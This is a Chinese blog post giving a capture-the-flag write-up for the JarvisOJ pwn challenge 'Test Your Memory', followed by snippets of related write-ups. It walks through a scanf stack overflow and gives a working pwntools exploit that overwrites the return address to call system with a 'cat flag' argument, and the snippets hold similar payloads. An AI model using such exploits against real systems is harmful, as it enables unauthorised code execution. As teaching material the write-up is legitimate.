[JarvisOJ][pwn]Test Your Memory

最新推荐文章于 2025-06-27 17:44:08 发布
最新推荐文章于 2025-06-27 17:44:08 发布
阅读量906 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 溢出攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_38204481/article/details/80936754
本文介绍了一个简单的栈溢出漏洞实例,通过分析程序代码,找到漏洞并利用system函数进行攻击,最终实现获取flag的目的。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

经历了前面2次的艰难,出题人或许嫌我们太累了,来了个简单的
走进程序找信息。开启的保护只有NX

.rodata:080487E0    00000009    C   cat flag

这里有命令字符串cat flag

0804A058        system

这里有system函数,然后找漏洞吧

int __cdecl mem_test(char *s2)
{
  int result; // eax
  char s; // [esp+15h] [ebp-13h]

  memset(&s, 0, 0xBu);
  puts("\nwhat???? : ");
  printf("0x%x \n", hint);
  puts("cff flag go go go ...\n");
  printf("> ");
  __isoc99_scanf("%s", &s);
  if ( !strncmp(&s, s2, 4u) )
    result = puts("good job!!\n");
  else
    result = puts("cff flag is failed!!\n");
  return result;
}

_isoc99_scanf(“%s”, &s);这里有栈溢出漏洞。
东西凑齐了,简单栈溢出,用system 函数覆盖返回地址就行了

from pwn import *
context.log_level="debug"

elf=ELF("memory")
call_system_addr=0x080485BD
catflag_addr=0x080487E0
#p=process("./memory")
p=remote("pwn2.jarvisoj.com",9876)
p.recvuntil("cff flag go go go ...\n")
p.recvline()
p.sendline("A"*(0x17)+p32(call_system_addr)+p32(0x08048677)+p32(catflag_addr))
p.recvuntil("is failed!!\n")


p.recv()

用system函数地址覆盖返回地址,运行system函数的时候参数是cat flag 的地址

有一点需要注意的是进来一个程序先仔细查找一下信息,可能会有意想不到的收获.

Jarvis OJ-PWN
weixin_45461609的博客
08-08 302
pwnTest_Your_Memory Test_Your_Memory 题目名字和题目没啥关系,真·一点关系也没有。 提供了system()函数 并且在mem_test函数中的输出hint的地址,hint地址内容为cat flag。 所以只需要将返回地址改成system()所在的地址,并将hint的地址传给system就能执行cat flag命令。 from pwn import * r=remote('pwn2.jarvisoj.com',9876) e=ELF('./memory') sys_a
Jarvis OJ pwn刷题
清霂的博客
03-26 287
目录level1level3level3_x64smashes level1 #!/usr/bin/env python3 from pwn import * context(os="linux", arch="i386", log_level="debug") content = 1 def main(): if content == 0: io = process("./level1.80eacdcd51aca92af7749d96efad7fb5") else:
18.9.20 Jarvis OJ PWN----Test Your Memory
qq_42192672的博客
09-20 383
先checksec一下 可以栈溢出 放到IDA里看一下,发现有system函数(在函数with_func中调用),喜出望外,同时搜索字符串时,可以发现打开flag的指令,如下 再看一下哪里可以溢出,在mem_test函数中,scanf就可以溢出 直接上脚本吧 #代码主体 system_addr=bin.symbols['win_func'] payload='a'*(0x...
【二进制安全】PWN基础入门大全(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python_0011的博客
06-27 877
PWN是一个黑客之间使用的词语,通常指攻破设备或系统。发音类似“砰”,对黑客而言,这象征着成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被操纵了。在网络安全语境中,PWN通常指的是通过不同的攻击手段如利用漏洞、进行社会工程学攻击等方法成功地获得了一个设备、系统或网络的未授权控制权。一旦攻击者“PWN了”一个系统,他们就可以执行各种恶意活动,如窃取数据、安装恶意软件或制造更广泛的破坏。
Jarvis oj Test your Memory writeup
ditto的博客
01-05 917
简单的ret2plt 检查下防护,只开了NX。 放ida里: 问题出在mem_test函数里: 点开hint,发现了有"cat flag"这个字符串: 而且还在rodata区里,那直接硬编码就可以了。 程序本身调用了system函数,那直接ret2plt就行了。 根据ida计算出溢出点: 溢出点0x13+4。 编写exp: from pwn import* a=remote("p...
jarvisoj——Test Your Memory
王嘟嘟的博客
07-31 877
题目 Wp 基本项检查,32位,开了NX,got表可写 这里看到alphanum_2626和mem_test 跟进mem_test,可以看到是scanf 这里可以看到偏移,直接上payload 这里一定要有返回地址,不然程序奔溃之后看不到flag from pwn import * sh = remote("pwn2.jarvisoj.com",9876) e=ELF('./TestYourMemory') sys_addr=e.symbols['system'] cat_flag_addr=e
JarvisOJ pwn Test Your Memory
苗_的博客
02-24 308
先找到几个关键函数: 单击main看一下函数结构: 点进mem_test看下: 找到溢出点:scanf 点进去hint发现了cat flag字符串..... (问题突然变得很简单....ret2libc) exp: from pwn import * #p = process('./memory') p = remote("pwn2.jarvisoj.com","9876") ...
jarvisoj pwn level4时LibcSearcher和DynELF搜到的libc版本不同
weixin_43350880的博客
08-07 878
jarvisoj pwn的level4乍一看是一道常规的ROP,可以ret2libc 但是遇到一个问题 自己写的脚本本地能跑通,远程跑不通 可以看到本地是能拿到shell的 在网上搜了其他人的wp,全都是用DynELF做的,对比发现是LibcSearcher和DynELF搜到的libc版本不同导致远程跑不通。 远程用DynELF找到的libc版本 远程LibcSearcher的结果 本地Dyn...
jarvisoj pwn level5 wp
zszcr的博客
03-26 2034
题目要求练习 mmap和mprotect 函数 不能调用system或者是execv函数来获取shell同时给了可执行文件和libc文件先查了下mmap和mprotect函数是干什么的两个函数原型如下:void* mmap(void* addr, size_t len, int port, int flag, int filedes, off_t off)#mmap(rdi=shellcode_a...
18.9.19 Jarvis OJ PWN----Smashes
qq_42192672的博客
09-19 598
先checksec一下 我的天,有栈保护,nx,咋办…… IDA进去,我们可以看见有个函数挺关键的,如下 我们可以看到stdin是可以无限输入的,但是只有接收输入时接收到'\n',才会继续执行(跳出while循环),找不出栈溢出的办法 然后看了大佬的操作之后发现:可以故意触发canary来攻击(SSP(Stack Smashing Protector ) leak) 先介绍一下好...
[Jarvis OJ - PWN]——Test Your Memory
Y_peak的博客
02-16 288
[Jarvis OJ - PWN]——Test Your Memory 题目地址: https://www.jarvisoj.com/challenges 题目: 32位程序,开了NX保护 IDA exploit from pwn import * #p = process("./memory") p = remote("pwn2.jarvisoj.com",9876) context.log_level = 'debug' cat_flag_addr = 0x080487E0 sys_ad
jarvisoj_test_your_memory
m0sway的博客
12-27 1400
jarvisoj_test_your_memory 使用checksec查看: 只开启了栈不可执行,应该还是一道栈溢出题目。 放进IDA中查看: 先是用printf()输出了一个不知道什么玩意的东西 然后调用men_test() 跟进查看men_test(): printf("0x%x \n", hint);:输出了hint的地址 __isoc99_scanf("%s", &s);:存在栈溢出,距离ebp0x13 题目思路: 题目存在栈溢出,可以进行溢出调用system 题目
Jarvis OJ-pwn test your memory
hanqdi_的博客
02-06 277
pwn test your memory 运行一下 检查保护机制 只开启堆栈不可执行保护。 观察反汇编代码,main函数里随机产生一串字符串,然后调用mem_test进行检测。 mem_test函数,先打印一个地址(hint),再输入s,这里存在栈溢出漏洞,然后输入的s与随机产生的字符串比较。 点进hint,提示是cat flag命令,可以获得flag 程序中已有system函数。 ...
[BUUCTF-pwn]——jarvisoj_test_your_memory
Y_peak的博客
03-16 304
[BUUCTF-pwn]——jarvisoj_test_your_memory 直接通过提示栈溢出 exploit from pwn import* p=remote('node3.buuoj.cn',"29320") context.log_level = 'debug' payload='a' * (0x13 + 4)+p32(0x8048440)+p32(0x8048677)+p32(0x80487E0) #system main cat flag p.
BUUCTF jarvisoj_test_your_memory
2401_88087539的博客
04-23 253
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
jarvisoj_level1
08-28
- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.youkuaiyun.com/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值